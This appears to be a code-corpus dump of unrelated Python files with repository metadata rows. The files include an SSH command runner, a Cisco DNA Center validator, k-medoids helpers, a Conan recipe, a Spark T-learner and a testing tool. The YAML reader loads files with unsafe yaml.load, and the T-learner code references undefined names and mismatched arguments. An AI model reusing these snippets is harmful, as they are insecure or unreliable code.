logger.debug("buf: " + str(buf))
return status, buf.decode()
def execute(self, command):
if self.host is None:
return self.local_execute(command)
cmd = ["ssh", self.user + "@" + self.host, ' '.join(command)]
_cmd = self.name + " execute: " + ' '.join(cmd)
logger.debug(_cmd)
try:
status = 0
buf = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
status = e.returncode
buf = e.output
logger.debug(self.name + " status: " + str(status))
logger.debug(self.name + " buf: " + str(buf))
return status, buf.decode()
# async execute
def execute_run(self, command, res):
if self.host is None:
cmd = command
else:
cmd = ["ssh", self.user + "@" + self.host, ' '.join(command)]
_cmd = self.name + " execute_run: " + ' '.join(cmd)
logger.debug(_cmd)
t = threading.Thread(target = execute_thread, args=(cmd, res))
t.start()
return t
def wait_execute_complete(self, t, wait=None):
if wait == None:
wait_str = "infinite"
else:
wait_str = str(wait) + "s"
logger.debug(self.name + " wait_execute_complete(" + wait_str + "): ")
if t.isAlive():
t.join(wait)
def add_log(self, log_file):
self.logs.append(log_file)
def get_logs(self, local_log_dir=None):
for log in self.logs:
if local_log_dir:
self.local_execute(["scp", self.user + "@[" + self.host + "]:" + log, local_log_dir])
self.execute(["rm", log])
del self.logs[:]
| 30.66055
| 101
| 0.573908
|
64d7d2814330d812da07985daacc86cce42cd7f3
| 3,414
|
py
|
Python
|
tests/models/validators/v2_2_2_3/jsd_df9908ad265e83ab77d73803925678.py
|
oboehmer/dnacentersdk
|
25c4e99900640deee91a56aa886874d9cb0ca960
|
[
"MIT"
] | 32
|
2019-09-05T05:16:56.000Z
|
2022-03-22T09:50:38.000Z
|
tests/models/validators/v2_2_2_3/jsd_df9908ad265e83ab77d73803925678.py
|
oboehmer/dnacentersdk
|
25c4e99900640deee91a56aa886874d9cb0ca960
|
[
"MIT"
] | 35
|
2019-09-07T18:58:54.000Z
|
2022-03-24T19:29:36.000Z
|
tests/models/validators/v2_2_2_3/jsd_df9908ad265e83ab77d73803925678.py
|
oboehmer/dnacentersdk
|
25c4e99900640deee91a56aa886874d9cb0ca960
|
[
"MIT"
] | 18
|
2019-09-09T11:07:21.000Z
|
2022-03-25T08:49:59.000Z
|
# -*- coding: utf-8 -*-
"""Cisco DNA Center UpdateSite data model.
Copyright (c) 2019-2021 Cisco Systems.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
import fastjsonschema
import json
from dnacentersdk.exceptions import MalformedRequest
from builtins import *
class JSONSchemaValidatorDf9908Ad265E83Ab77D73803925678(object):
"""UpdateSite request schema definition."""
def __init__(self):
super(JSONSchemaValidatorDf9908Ad265E83Ab77D73803925678, self).__init__()
self._validator = fastjsonschema.compile(json.loads(
'''{
"$schema": "http://json-schema.org/draft-04/schema#",
"properties": {
"response": {
"properties": {
"data": {
"type": "string"
},
"endTime": {
"type": "string"
},
"id": {
"type": "string"
},
"instanceTenantId": {
"type": "string"
},
"isError": {
"type": "string"
},
"operationIdList": {
"items": {
"type": "string"
},
"type": "array"
},
"progress": {
"type": "string"
},
"rootId": {
"type": "string"
},
"serviceType": {
"type": "string"
},
"startTime": {
"type": "string"
},
"version": {
"type": "string"
}
},
"type": "object"
},
"result": {
"type": "string"
},
"status": {
"type": "string"
}
},
"type": "object"
}'''.replace("\n" + ' ' * 16, '')
))
def validate(self, request):
try:
self._validator(request)
except fastjsonschema.exceptions.JsonSchemaException as e:
raise MalformedRequest(
'{} is invalid. Reason: {}'.format(request, e.message)
)
| 31.906542
| 81
| 0.522261
|
c4502f105f976baa26c345fa774e8ad477a0411e
| 1,521
|
py
|
Python
|
src/recsys/data_prep/calculate_loo_stats.py
|
csy1204/recsys_2019_conf_ver
|
c072407f46dbff73a0e0c916dd4379e6a9e6594b
|
[
"Apache-2.0"
] | null | null | null |
src/recsys/data_prep/calculate_loo_stats.py
|
csy1204/recsys_2019_conf_ver
|
c072407f46dbff73a0e0c916dd4379e6a9e6594b
|
[
"Apache-2.0"
] | 6
|
2020-09-26T01:19:12.000Z
|
2021-08-25T16:09:24.000Z
|
src/recsys/data_prep/calculate_loo_stats.py
|
csy1204/recsys_2019_conf_ver
|
c072407f46dbff73a0e0c916dd4379e6a9e6594b
|
[
"Apache-2.0"
] | null | null | null |
from collections import defaultdict
from csv import DictWriter
import pandas as pd
import sys
sys.path.append('/Users/josang-yeon/2020/tobigs/tobigs_reco_conf/recsys2019/src')
from recsys.data_generator.accumulators import ACTIONS_WITH_ITEM_REFERENCE
from tqdm import tqdm
import numpy as np
import joblib
"""
Calculates leave one out stats
"""
data = pd.read_csv("../../../data/events_sorted.csv")
stats = {}
"""
Build stats
item_id -> stat_name -> set(users)
"""
for action_type, user_id, impression, reference in tqdm(
zip(data["action_type"], data["user_id"], data["impressions"], data["reference"])
):
if reference is None or reference == np.nan or action_type != "clickout item":
continue
for item_id in impression.split("|"):
item_id = int(item_id)
try:
stats[item_id]["impressions"].add(user_id)
except KeyError:
stats[item_id] = {"impressions": {user_id}}
for user_id, reference, action_type in tqdm(zip(data["user_id"], data["reference"], data["action_type"])):
if reference is None or reference == np.nan:
continue
if action_type in ACTIONS_WITH_ITEM_REFERENCE:
try:
item_id = int(reference)
except:
continue
if item_id not in stats:
stats[item_id] = {}
try:
stats[item_id][action_type].add(user_id)
except KeyError:
stats[item_id][action_type] = {user_id}
joblib.dump(stats, "../../../data/item_stats_loo.joblib")
| 27.654545
| 106
| 0.657462
|
538577eb13e75bb83ca54074247ccb987e112ed7
| 9,791
|
py
|
Python
|
clustering/kmedoids_helper.py
|
msilvestro/dupin
|
db06432cab6910c6965b9c35baaef96eb84f0d81
|
[
"MIT"
] | null | null | null |
clustering/kmedoids_helper.py
|
msilvestro/dupin
|
db06432cab6910c6965b9c35baaef96eb84f0d81
|
[
"MIT"
] | null | null | null |
clustering/kmedoids_helper.py
|
msilvestro/dupin
|
db06432cab6910c6965b9c35baaef96eb84f0d81
|
[
"MIT"
] | null | null | null |
"""Helper functions for k-medoids algorithms."""
import numpy as np
from numba import jit
def _get_clusters(metric=None, method='memory'):
# if a method requires it, check if a metric is given
if method in ('hybrid', 'cpu') and not metric:
print("Error: with method `{:}` a metric is necessary.")
return
if method == 'memory':
return get_clusters_memory
if method == 'hybrid':
return lambda data, medoids: get_clusters_hybrid(data, medoids, metric)
if method == 'cpu':
return _get_clusters_cpu(metric)
print("Error: method `{:}` unknown.".format(method))
return
def _get_medoid(metric=None, method='memory'):
# if a method requires it, check if a metric is given
if method in ('hybrid', 'cpu') and not metric:
print("Error: with method `{:}` a metric is necessary.")
return
if method == 'memory':
return get_medoid_memory
if method == 'hybrid':
return _get_medoid_hybrid(metric)
if method == 'cpu':
return _get_medoid_cpu(metric)
print("Error: method `{:}` unknown.".format(method))
return
@jit
def get_clusters_memory(diss, medoids):
r"""Compute the clusters induced by the medoids on the dissimilarity matrix.
Parameters
----------
diss : (n, n) ndarray
Squared symmetric dissimilarity matrix.
medoids : (n,) ndarray
Set of medoids, given as index of data objects representing them.
Returns
-------
clusterid : ndarray
An array containing the number of the cluster to which each object was
assigned, where the cluster number is defined as the object number of
the objects representing the cluster centroid.
error : float
The within-cluster sum of distances of the clustering solution.
Notes
-----
Very fast implementation. Requires enough memory to store a n\*n matrix
(that is the dissimilarity matrix, n is the number of data objects).
"""
# take the submatrix in which columns corresponds to the medoids, then take
# the argmin row-wise
clustermem = diss[:, medoids].argmin(axis=1)
# we want a vector with medoid indices with respect to the data and not
# positional indices, i.e. we do not want [0, 1, 2] but
# [med_1, med_2, med_3]
clusterid = np.empty(clustermem.shape[0], dtype=np.uint32)
for i, medoid in enumerate(medoids):
clusterid[clustermem == i] = medoid
# compute also the error
error = diss[:, medoids].min(axis=1).sum()
return clusterid, error
@jit
def get_medoid_memory(diss, cluster):
r"""Compute the medoid of a cluster.
Parameters
----------
diss : (n, n) ndarray
Squared symmetric dissimilarity matrix.
cluster : (n,) ndarray
Set of the indices of all objects belonging to the cluster.
Returns
-------
medoid : int
Index of the object chosen as medoid of the cluster, i.e. it is the
object that minimizes the sum of distances with respect to all the
other cluster members.
Notes
-----
Very fast implementation. Requires enough memory to store a n\*n matrix
(that is the dissimilarity matrix, n is the number of data objects).
"""
medoid = cluster[np.sum(
diss[np.ix_(cluster, cluster)], axis=1
).argmin()]
return medoid
@jit
def get_clusters_hybrid(data, medoids, metric):
r"""Compute the clusters induced by the medoids on data.
Parameters
----------
data : (n,) ndarray
Data set.
medoids : (n,) ndarray
Set of medoids, given as index of data objects representing them.
metric : function
Function to compute pairwise distances.
Returns
-------
clusterid : (n,) ndarray
An array containing the number of the cluster to which each object was
assigned, where the cluster number is defined as the object number of
the objects representing the cluster centroid.
error : float
The within-cluster sum of distances of the clustering solution.
Notes
-----
Quite fast implementation. Requires enough memory to store a n\*k matrix
(n is the number of data objects and k is the number of clusters).
"""
# make a big matrix that in the i-th row has the distances between the i-th
# object and the medoids
dists = np.zeros((data.shape[0], medoids.shape[0]))
for i, obj in enumerate(data):
for j, med in enumerate(medoids):
if i != med:
dists[i, j] = metric(obj, data[med])
# take the index corresponding to the medoid with minimum distance from the
# object
clustermem = dists.argmin(axis=1)
# we want a vector with medoid indices with respect to the data and not
# positional indices, i.e. we do not want [0, 1, 2] but
# [med_1, med_2, med_3]
clusterid = np.empty(clustermem.shape[0], dtype=np.uint32)
for i, medoid in enumerate(medoids):
clusterid[clustermem == i] = medoid
# take the minimum row-wise and sum the resulting vector to get the error
error = dists.min(axis=1).sum()
return clusterid, error
def _get_medoid_hybrid(metric):
@jit(nopython=True)
def get_medoid_hybrid(data, cluster):
r"""Compute the medoid of a cluster.
Parameters
----------
data : (n,) ndarray
Data set.
cluster : (n,) ndarray
Set of the indices of all objects belonging to the cluster.
metric : function
Function to compute pairwise distances.
Returns
-------
medoid : int
Index of the object chosen as medoid of the cluster, i.e. it is the
object that minimizes the sum of distances with respect to all the
other cluster members.
Notes
-----
Quite fast implementation. Requires enough memory to store a m\*m
matrix (m is the size of the given cluster).
"""
# make a dissimilarity matrix of the cluster passed in
m = cluster.shape[0]
diss = np.zeros((m, m))
for i in range(m):
for j in range(i+1):
dist = metric(data[cluster[i]], data[cluster[j]])
diss[i, j] = dist
diss[j, i] = dist
# then take the sum by row and choose the cluster member that minimizes
# it
medoid = cluster[diss.sum(axis=1).argmin()]
return medoid
return get_medoid_hybrid
def _get_clusters_cpu(metric):
@jit(nopython=True)
def get_clusters_cpu(data, medoids):
"""Compute the clusters induced by the medoids on data.
Parameters
----------
data : (n,) ndarray
Data set.
medoids : (n,) ndarray
Set of medoids, given as index of data objects representing them.
metric : function
Function to compute pairwise distances.
Returns
-------
clusterid : (n,) ndarray
An array containing the number of the cluster to which each object
was assigned, where the cluster number is defined as the object
number of the objects representing the cluster centroid.
error : float
The within-cluster sum of distances of the clustering solution.
Notes
-----
Slowest implementation. Does not require to store matrices in memory.
Version to let `numba` run in `nopython` mode (faster).
"""
n = data.shape[0]
k = medoids.shape[0]
clusterid = np.empty(n, dtype=np.uint32)
error = 0
for i in range(n):
# select the cluster whom medoid is closest to the current object
min_dist = np.inf
min_j = -1
for j in range(k):
if i == medoids[j]:
# if the object is a medoid, its cluster will not change
# hence end the loop
min_dist = 0
min_j = j
break
else:
dist = metric(data[i], data[medoids[j]])
if dist < min_dist:
min_dist = dist
min_j = j
clusterid[i] = medoids[min_j]
error += min_dist
return clusterid, error
return get_clusters_cpu
def _get_medoid_cpu(metric):
@jit(nopython=True)
def get_medoid_cpu(data, cluster):
"""Compute the medoid of a cluster.
Parameters
----------
data : (n,) ndarray
Data set.
cluster : (n,) ndarray
Set of the indices of all objects belonging to the cluster.
metric : function
Function to compute pairwise distances.
Returns
-------
medoid : int
Index of the object chosen as medoid of the cluster, i.e. it is the
object that minimizes the sum of distances with respect to all the
other cluster members.
Notes
-----
Slowest implementation. Does not require to store matrices in memory.
Version to let `numba` run in `nopython` mode (faster).
"""
min_dist = np.inf
medoid = -1
for prop in cluster:
# for each proposed medoid, compute the sum of distances between it
# and each other cluster member
dist = 0
for j in cluster:
if prop != j:
dist += metric(data[prop], data[j])
# retain it only if it has a lower sum of distances
if dist < min_dist:
min_dist = dist
medoid = prop
return medoid
return get_medoid_cpu
| 32.528239
| 80
| 0.597283
|
4cc6782e39a34694a60836248f132bc1ed7eb44b
| 884
|
py
|
Python
|
libraries/parser/yaml.py
|
devetek/Omni
|
3a0676f307bd1814da925e1a184743c517ec9307
|
[
"Apache-2.0"
] | 4
|
2019-04-30T11:07:11.000Z
|
2019-06-10T03:03:37.000Z
|
libraries/parser/yaml.py
|
devetek/Omni
|
3a0676f307bd1814da925e1a184743c517ec9307
|
[
"Apache-2.0"
] | 8
|
2019-07-17T17:13:09.000Z
|
2022-02-26T15:40:01.000Z
|
libraries/parser/yaml.py
|
devetek/Omni
|
3a0676f307bd1814da925e1a184743c517ec9307
|
[
"Apache-2.0"
] | null | null | null |
import yaml
import os.path
from urlparse import urlparse
class Ryaml:
PATH = ''
IS_PATH = True
def __init__(self):
pass
def set_path(self, path):
isFile = os.path.isfile(path)
self.IS_PATH = isFile
if self.__is_path():
self.PATH = path
else:
self.PATH = ""
def get_path(self):
return self.PATH
def __is_path(self):
return self.IS_PATH
def __open_file(self):
try:
with open(self.PATH, 'r') as yamlFile:
data = yaml.load(yamlFile)
return data
except:
return {}
def read(self):
return self.__open_file()
if __name__ == '__main__':
pass
# PATH_TEST = "./../roles/node/main.yaml"
# yamlReader = Ryaml()
# yamlReader.set_path(PATH_TEST)
# dictPATH = yamlReader.read()
| 18.040816
| 50
| 0.548643
|
eb6df7f19c6af69a774f0bc00beef20f4264b368
| 784
|
py
|
Python
|
projects/migrations/0005_auto_20190407_1457.py
|
vineethreddyramasa/uno-community-partnership
|
694886b7ad7fa98f6dbb24b03476962cfadebc70
|
[
"MIT"
] | 13
|
2018-08-30T16:03:18.000Z
|
2019-11-25T07:08:43.000Z
|
projects/migrations/0005_auto_20190407_1457.py
|
vineethreddyramasa/uno-community-partnership
|
694886b7ad7fa98f6dbb24b03476962cfadebc70
|
[
"MIT"
] | 814
|
2018-08-30T02:28:55.000Z
|
2022-03-11T23:31:45.000Z
|
projects/migrations/0005_auto_20190407_1457.py
|
vineethreddyramasa/uno-community-partnership
|
694886b7ad7fa98f6dbb24b03476962cfadebc70
|
[
"MIT"
] | 6
|
2018-09-16T05:35:49.000Z
|
2019-10-17T02:44:19.000Z
|
# Generated by Django 2.1.1 on 2019-04-07 19:57
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('projects', '0004_auto_20190407_1443'),
]
operations = [
migrations.AlterField(
model_name='project',
name='academic_year',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='academic_year1', to='projects.AcademicYear'),
),
migrations.AlterField(
model_name='project',
name='end_academic_year',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='academic_year2', to='projects.AcademicYear'),
),
]
| 31.36
| 151
| 0.658163
|
3108e5c2b20036e6d0245f4c28e5eedda948e66a
| 398
|
py
|
Python
|
NC 5/code.py
|
swy20190/NiuKe
|
d9dbbbbac403f5b4fe37efe82f9708aff614f018
|
[
"MIT"
] | null | null | null |
NC 5/code.py
|
swy20190/NiuKe
|
d9dbbbbac403f5b4fe37efe82f9708aff614f018
|
[
"MIT"
] | null | null | null |
NC 5/code.py
|
swy20190/NiuKe
|
d9dbbbbac403f5b4fe37efe82f9708aff614f018
|
[
"MIT"
] | null | null | null |
n = int(input())
string = input()
dp = []
for i in range(26):
dp.append([0]*n)
for i in range(n-1):
for j in range(26):
dp[j][n-2-i] = dp[j][n-1-i]
dp[ord(string[n-1-i])-ord('a')][n-2-i] += 1
answer = 0
for i in range(n-2):
for j in range(26):
if ord(string[i])-ord('a') != j:
times = dp[j][i]
answer += times*(times-1)/2
print(int(answer))
| 22.111111
| 47
| 0.492462
|
b4c52dbaa8cb9f3e72e956ffb21e165f9fea83d1
| 2,629
|
py
|
Python
|
recipes/gemmlowp/all/conanfile.py
|
Tereius/conan-center-index
|
6b0523fa57d8e8e890b040e95576f0bc584eeba8
|
[
"MIT"
] | 562
|
2019-09-04T12:23:43.000Z
|
2022-03-29T16:41:43.000Z
|
recipes/gemmlowp/all/conanfile.py
|
Tereius/conan-center-index
|
6b0523fa57d8e8e890b040e95576f0bc584eeba8
|
[
"MIT"
] | 9,799
|
2019-09-04T12:02:11.000Z
|
2022-03-31T23:55:45.000Z
|
recipes/gemmlowp/all/conanfile.py
|
Tereius/conan-center-index
|
6b0523fa57d8e8e890b040e95576f0bc584eeba8
|
[
"MIT"
] | 1,126
|
2019-09-04T11:57:46.000Z
|
2022-03-31T16:43:38.000Z
|
import os
from conans import ConanFile, CMake, tools
from conans.errors import ConanInvalidConfiguration
required_conan_version = ">=1.37.0"
class GemmlowpConan(ConanFile):
name = "gemmlowp"
license = "Apache-2.0"
url = "https://github.com/conan-io/conan-center-index"
homepage = "https://github.com/google/gemmlowp"
description = "Low-precision matrix multiplication"
topics = ("gemm", "matrix")
settings = "os", "arch", "compiler", "build_type"
options = {"shared": [True, False],
"fPIC": [True, False]}
default_options = {"shared": False,
"fPIC": True}
exports_sources = ["CMakeLists.txt"]
generators = "cmake", "cmake_find_package", "cmake_find_package_multi"
_cmake = None
@property
def _source_subfolder(self):
return "source_subfolder"
@property
def _build_subfolder(self):
return "build_subfolder"
def source(self):
tools.get(**self.conan_data["sources"][self.version], strip_root=True, destination=self._source_subfolder)
def validate(self):
if self.settings.os == "Windows" and self.options.shared:
raise ConanInvalidConfiguration("shared is not supported on Windows")
def configure(self):
if self.options.shared:
del self.options.fPIC
def config_options(self):
if self.settings.os == "Windows":
del self.options.fPIC
def _configure_cmake(self):
if self._cmake:
return self._cmake
self._cmake = CMake(self)
self._cmake.definitions['BUILD_TESTING'] = False
self._cmake.configure(build_folder=self._build_subfolder)
return self._cmake
def build(self):
cmake = self._configure_cmake()
cmake.build()
def package(self):
self.copy("LICENSE", dst="licenses", src=self._source_subfolder)
cmake = self._configure_cmake()
cmake.install()
tools.rmdir(os.path.join(self.package_folder, "lib", "cmake"))
tools.rmdir(os.path.join(self.package_folder, "lib", "pkgconfig"))
tools.rmdir(os.path.join(self.package_folder, "share"))
def package_info(self):
self.cpp_info.components["eight_bit_int_gemm"].names["cmake_find_package"] = "eight_bit_int_gemm"
self.cpp_info.components["eight_bit_int_gemm"].names["cmake_find_package_multi"] = "eight_bit_int_gemm"
self.cpp_info.components["eight_bit_int_gemm"].libs = ["eight_bit_int_gemm"]
if self.settings.os == "Linux":
self.cpp_info.components["eight_bit_int_gemm"].system_libs.extend(["pthread"])
| 36.013699
| 114
| 0.659947
|
6ba7be2f303044a60bdd02da51266452eba1a045
| 1,164
|
py
|
Python
|
models/AI-Model-Zoo/VAI-1.3-Model-Zoo-Code/PyTorch/pt_pointpillars_kitti_12000_100_10.8G_1.3/code/train/torchplus/ops/__init__.py
|
guochunhe/Vitis-AI
|
e86b6efae11f8703ee647e4a99004dc980b84989
|
[
"Apache-2.0"
] | 1
|
2020-12-18T14:49:19.000Z
|
2020-12-18T14:49:19.000Z
|
models/AI-Model-Zoo/VAI-1.3-Model-Zoo-Code/PyTorch/pt_pointpillars_kitti_12000_100_10.8G_1.3/code/train/torchplus/ops/__init__.py
|
guochunhe/Vitis-AI
|
e86b6efae11f8703ee647e4a99004dc980b84989
|
[
"Apache-2.0"
] | null | null | null |
models/AI-Model-Zoo/VAI-1.3-Model-Zoo-Code/PyTorch/pt_pointpillars_kitti_12000_100_10.8G_1.3/code/train/torchplus/ops/__init__.py
|
guochunhe/Vitis-AI
|
e86b6efae11f8703ee647e4a99004dc980b84989
|
[
"Apache-2.0"
] | null | null | null |
# This code is based on: https://github.com/nutonomy/second.pytorch.git
#
# MIT License
# Copyright (c) 2018
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
| 52.909091
| 80
| 0.777491
|
9ab6ca4e4dc1fe24b6a27e16f99f5f4e307b4acf
| 5,372
|
py
|
Python
|
reina/MetaLearners/TLearner.py
|
SoumilShekdar/Reina
|
638240a979a90a9b6ca9efb40edef6ecc71d836f
|
[
"MIT"
] | null | null | null |
reina/MetaLearners/TLearner.py
|
SoumilShekdar/Reina
|
638240a979a90a9b6ca9efb40edef6ecc71d836f
|
[
"MIT"
] | null | null | null |
reina/MetaLearners/TLearner.py
|
SoumilShekdar/Reina
|
638240a979a90a9b6ca9efb40edef6ecc71d836f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
"""
Provides a spark-based T-learner heterogeneous treatment effect estimator.
"""
import pyspark
from pyspark.sql.functions import monotonically_increasing_id
from pyspark.ml.feature import VectorAssembler
from pyspark.sql.functions import avg
from pyspark.sql.functions import lit
from pyspark.sql.functions import col
from pyspark.sql.functions import when
from pyspark.sql import SparkSession
from pyspark.sql.functions import udf
from pyspark.sql.types import FloatType
class TLearner:
"""
Spark-based T-learner heterogeneous treatment effect estimator.
Assumptions
---------------
This class assumes that the data is already stored in a distributed storage system (e.g., HDFS).
This class also assumes that the treatment variable only contains 1s and 0s.
"""
def __init__(self, learner="T"):
self.treatments = [] # Multiple treatment effects can be estimated
self.outcome = None
self.covariates = []
self.estimator_0 = None
self.estimator_1 = None
def fit(self, data, treatments, outcome, estimator_0, estimator_1):
"""
Wrapper function to fit an ML-based counterfacual model.
When multiple treatments are inputted, each treatment effect is estiamted individually.
Parameters
----------
data (2-D Spark dataframe): Base dataset containing features, treatment, iv, and outcome variables
treatments (List): Names of the treatment variables
outcome (Str): Name of the outcome variable
estimator_0 (mllib model obj): Arbitrary ML model of choice
estimator_1 (mllib model obj): Arbitrary ML model of choice
Returns
------
self
"""
self.treatments = treatments
self.outcome = outcome
self.covariates = [var for var in data.columns if var not in treatments and var != outcome]
self.estimator_0 = estimator_0
self.estimator_1 = estimator_1
self.__fit(data)
def effects(self, X, treatment):
"""
Function to get the estimated heterogeneous treatment effect from the fitted counterfactual model.
The treatment effect is calculated by taking the difference between the predicted counterfactual outcomes.
Parameters
----------
X (2-D Spark dataframe): Feature data to estimate treatment effect of
treatment (Str): Name of the treatment variable
returns
-------
cate: conditional average treatment effect
ate: average treatment effect
"""
# Input treatment has to be fitted
assert treatment in self.treatments
# Ger predictions for treatment and control group
assembler = VectorAssembler(inputCols=self.covariates+[treatment], outputCol='features')
X_assembled = assembler.transform(X)
prediction_1 = estimator_1.transform(X_assembled.select('features')).withColumnRenamed("prediction", "prediction_1").select("prediction_1")
prediction_0 = estimator_0.transform(X_assembled.select('features')).withColumnRenamed("prediction", "prediction_0").select("prediction_0")
# Get Cate
X_w_pred = self.__mergeDfCol(X, prediction_1)
X_w_pred = self.__mergeDfCol(X_w_pred, prediction_0)
self.cate[treatment] = X_w_pred.select(X_w_pred.prediction_1 - X_w_pred.prediction_0).withColumnRenamed("(prediction_1 - prediction_0)", "cate")
self.average_treatment_effects[treatment] = float(self.cate[treatment].groupby().avg().head()[0])
return cate, ate
def __fit(self, data, estimator_1, estimator_0):
for treatment in self.treatments:
# Set up assembler
assembler = VectorAssembler(inputCols=self.covariates+[treatment], outputCol='features')
# First estimator (treatment group)
treatment_group = data.filter(treatment+" == 1")
treatment_group_assembled = assembler.transform(treatment_group)
treatment_group_assembled = treatment_group_assembled.select(['features', self.outcome])
self.estimator_1 = self.estimator_1.fit(treatment_group_assembled)
# Second estimator (control group)
control_group = data.filter(treatment+" == 0")
control_group_assembled = assembler.transform(control_group)
control_group_assembled = control_group_assembled.select(['features', self.outcome])
self.estimator_0 = self.estimator_0.fit(control_group_assembled)
def __mergeDfCol(self, df_1, df_2):
"""
Function to merge two spark dataframes.
Parameters
----------
df_1 (2-D Spark dataframe): Spark dataframe to merge
df_2 (2-D Spark dataframe): Spark dataframe to merge
Returns
------
df_3 (2-D Spark dataframe): Spark dataframe merged by df1 and df2
"""
df_1 = df_1.withColumn("COL_MERGE_ID", monotonically_increasing_id())
df_2 = df_2.withColumn("COL_MERGE_ID", monotonically_increasing_id())
df_3 = df_2.join(df1, "COL_MERGE_ID").drop("COL_MERGE_ID")
return df_3
| 40.089552
| 152
| 0.657111
|
e5a5bae27ddc1ba6b78eb733e75cae83cee92ddd
| 35,273
|
py
|
Python
|
src/b2bt/main.py
|
HubTou/b2bt
|
9e53a254226f7eaee32da332c3340b906c36c1eb
|
[
"BSD-3-Clause"
] | null | null | null |
src/b2bt/main.py
|
HubTou/b2bt
|
9e53a254226f7eaee32da332c3340b906c36c1eb
|
[
"BSD-3-Clause"
] | 1
|
2021-06-05T07:59:58.000Z
|
2021-06-05T08:19:57.000Z
|
src/b2bt/main.py
|
HubTou/b2bt
|
9e53a254226f7eaee32da332c3340b906c36c1eb
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
""" b2bt - back-to-back testing
License: 3-clause BSD (see https://opensource.org/licenses/BSD-3-Clause)
Author: Hubert Tournier
"""
import ctypes
import difflib
import getopt
import getpass
import hashlib
import locale
import logging
import os
import platform
import shutil
import subprocess
import sys
import time
# Mandatory dependency upon defusedxml
import defusedxml.minidom
# Optional dependency upon colorama
# Use "pip install colorama" to install
try:
import colorama
COLORAMA = True
except ModuleNotFoundError:
COLORAMA = False
# Version string used by the what(1) and ident(1) commands:
ID = "@(#) $Id: b2bt - back-to-back testing v1.1.2 (September 26, 2021) by Hubert Tournier $"
__version__ = "1.1.2"
# Default parameters. Can be overcome by environment variables, then command line options
DEFAULT_TIMEOUT = 120.0
MINIMUM_DEFAULT_TIMEOUT = 30.0
parameters = {
"Original command path": "",
"New command path": "",
"Keep results": False,
"Overwrite results": False,
"Quiet differences": False,
"Skip original command": False,
"Auto confirm": False,
"No colors": False,
"Timeout": DEFAULT_TIMEOUT,
}
################################################################################
def initialize_debugging(program_name):
"""Debugging set up"""
console_log_format = program_name + ": %(levelname)s: %(message)s"
logging.basicConfig(format=console_log_format, level=logging.DEBUG)
logging.disable(logging.INFO)
################################################################################
def display_help():
"""Displays usage and help"""
print("usage: b2bt [--debug] [-f|--force] [--help|-?] [-k|--keep]", file=sys.stderr)
print(
" [-n|--newpath PATH] [-o|--origpath PATH] [-q|--quiet] [-s|--skip]",
file=sys.stderr,
)
print(
" [-t|--timeout VALUE] [--version] [-y|--autoconfirm] [-N|--nocolors]",
file=sys.stderr,
)
print(" [--] filename [...]", file=sys.stderr)
print(
" ------------------ --------------------------------------------------",
file=sys.stderr,
)
print(" -f|--force Overwrite results directories", file=sys.stderr)
print(
" -k|--keep Keep results directories after running", file=sys.stderr
)
print(" -n|--newpath PATH Path of the new command", file=sys.stderr)
print(
" -o|--origpath PATH Path of the original command if not in $PATH",
file=sys.stderr,
)
print(" -q|--quiet Don't detail run differences", file=sys.stderr)
print(" -s|--skip Skip original command processing", file=sys.stderr)
print(
" -t|--timeout VALUE Set default timeout (%0.1f s) to a new value"
% DEFAULT_TIMEOUT,
file=sys.stderr,
)
print(
" -y|--autoconfirm Don't ask for confirmation before test case execution",
file=sys.stderr,
)
print(" -N|--nocolors Don't use colors in output", file=sys.stderr)
print(" --debug Enable debug mode", file=sys.stderr)
print(
" --help|-? Print usage and this help message and exit",
file=sys.stderr,
)
print(" --version Print version and exit", file=sys.stderr)
print(" -- Options processing terminator", file=sys.stderr)
print(file=sys.stderr)
################################################################################
def process_environment_variables():
"""Process environment variables"""
# pylint: disable=C0103
global parameters
# pylint: enable=C0103
if "B2BT_OPTIONS" in os.environ.keys():
if "f" in os.environ["B2BT_OPTIONS"]:
parameters["Overwrite results"] = True
if "k" in os.environ["B2BT_OPTIONS"]:
parameters["Keep results"] = True
if "q" in os.environ["B2BT_OPTIONS"]:
parameters["Quiet differences"] = True
if "s" in os.environ["B2BT_OPTIONS"]:
parameters["Skip original command"] = True
if "y" in os.environ["B2BT_OPTIONS"]:
parameters["Auto confirm"] = True
